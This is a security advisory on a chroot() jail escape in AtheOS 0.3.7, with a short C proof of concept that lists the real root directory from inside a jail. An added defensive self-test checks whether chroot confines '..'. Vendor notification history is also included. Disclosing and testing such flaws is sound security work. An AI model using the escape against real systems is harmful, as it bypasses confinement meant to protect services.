-------( AtheOS )-------
AtheOS is a free desktop operating system under the GPL license. AtheOS
currently runs on Intel, AMD and other compatible processors and supports
the Intel Multi Processor architecture.
The AtheOS home page is: http://www.atheos.cx
-------( Vulnerability )-------
A chroot() call is implemented in AtheOS, and its behavior is supposed to
be POSIX conformant. Once chroot(<directory>) is issued by a process,
<directory> should become the base directory ('/'), with no way to get out
of the jail. That feature is widely used to protect applications against
unwanted directory traversals (ftp, http, etc.).
After a chroot() call on AtheOS, '/' does indeed seem to become the base
directory: '/path/to/file' is translated to '<directory>/path/to/file'.
Unfortunately, relative paths aren't checked against the current chroot
jail. Therefore, '../../../../path/to/file' is translated to a file outside
the chroot limits.
-------( Affected versions )-------
Version 0.3.7 seems to be affected by that bug. I didn't check any prior
release, but they may be vulnerable as well.
-------( Simple proof of concept )-------
The following code will read the contents of the real '/' directory, while
'/tmp' is supposed to be the base of the chroot jail.

    #include <stdio.h>
    #include <unistd.h>
    #include <dirent.h>

    int main(void)
    {
        DIR *d;
        const struct dirent *e;

        /* Enter a jail rooted at /tmp, then open ".." from the new root.
         * On a conformant system ".." at the jail root is the jail root
         * itself; on AtheOS 0.3.7 the relative path is not checked against
         * the jail and resolves to the real "/". */
        if (chdir("/") || chroot("/tmp") || chdir("/") ||
            (d = opendir("..")) == NULL) {
            return 1;
        }
        /* Print every entry of the directory that ".." resolved to. */
        while ((e = readdir(d)) != NULL) {
            puts(e->d_name);
        }
        closedir(d);
        return 0;
    }
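The proof of concept above shows the escape; the complementary check a defender wants is a small self-test that tells whether a given chroot() implementation actually confines relative paths before an application is trusted to it. The following program is an added example and is not part of the original advisory: jail_root_is_top() stats a directory and its ".." and reports whether they are the same inode (which is what POSIX requires for the root of the visible tree), and chroot_confines() runs that check on "/" after entering a jail. The jail directory "/tmp" in main() is only a default chosen for illustration, and the chroot step needs root privileges.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Return 1 if "<dir>/.." resolves to the same inode as <dir>, meaning <dir>
 * is the top of the tree visible to this process; 0 if ".." leads
 * somewhere else; -1 on error (directory missing, path too long, ...). */
int jail_root_is_top(const char *dir)
{
    char parent[4096];
    struct stat here, up;

    if (strlen(dir) + sizeof("/..") > sizeof parent)
        return -1;
    snprintf(parent, sizeof parent, "%s/..", dir);
    if (stat(dir, &here) != 0 || stat(parent, &up) != 0)
        return -1;
    return (here.st_dev == up.st_dev && here.st_ino == up.st_ino) ? 1 : 0;
}

/* Self-test of the chroot() implementation (requires root): enter <jail>,
 * then ask whether ".." from the new "/" still points at the new "/".
 * Returns 1 if the jail confines relative paths, 0 if ".." escapes it,
 * -1 if the jail could not be entered. */
int chroot_confines(const char *jail)
{
    if (chdir(jail) != 0 || chroot(jail) != 0 || chdir("/") != 0)
        return -1;
    return jail_root_is_top("/");
}

int main(int argc, char **argv)
{
    /* Hypothetical default jail directory; pass another one as argv[1]. */
    const char *jail = argc > 1 ? argv[1] : "/tmp";
    int r;

    if (geteuid() != 0) {
        /* Without root we cannot chroot(); only report what ".." does
         * for the directory as seen from the current tree. */
        r = jail_root_is_top(jail);
        printf("%s: not root, no chroot performed; '..' %s\n", jail,
               r == 1 ? "stays in place" : r == 0 ? "leaves the directory"
                                                  : "could not be checked");
        return r < 0 ? 2 : 0;
    }
    r = chroot_confines(jail);
    if (r < 0) {
        perror("chroot");
        return 2;
    }
    printf("chroot(%s): relative paths are %s\n", jail,
           r ? "confined (POSIX behaviour)" : "NOT confined: '..' escapes");
    return r ? 0 : 1;
}
```

Run as root with the candidate jail directory as its argument; an exit status of 1 means the platform shows the same defect this advisory describes and chroot() should not be relied on there. Even where the check passes, chroot() only confines unprivileged processes, so the jailed application should still drop root after the call.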
-------( Vendor notification )-------
I reported the problem to the AtheOS maintainer <kurt@atheos.cx> on
January 2nd. The mail bounced (message id: 20020102235031.A20057@c9x.org)
on January 10th.
I sent back another mail to <webmaster@atheos.cx> (message id:
20020110000235.GA31372@c9x.org). The mail bounced on January 17th.
I finally sent a mail to the AtheOS-Developer mailing-list. No one ever
answered.
-------( Impact )-------
Don't trust chroot() on AtheOS. Users can traverse directories.
Best regards,
-Frank.
--
Frank DENIS (Jedi/Sector One) <j@42-Networks.Com>
Secure FTP Server: http://www.PureFTPd.Org/
Misc. free software: http://www.Jedi.Claranet.Fr/